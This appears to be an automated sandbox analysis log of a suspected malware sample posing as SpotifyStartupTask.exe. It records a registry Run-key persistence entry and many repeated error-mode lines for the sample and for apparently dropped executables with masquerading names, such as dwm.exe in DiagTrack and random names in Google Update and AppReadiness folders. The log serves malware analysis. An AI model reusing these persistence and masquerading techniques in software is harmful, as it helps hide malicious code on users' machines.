                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SpotifyStartupTaskJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\dwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
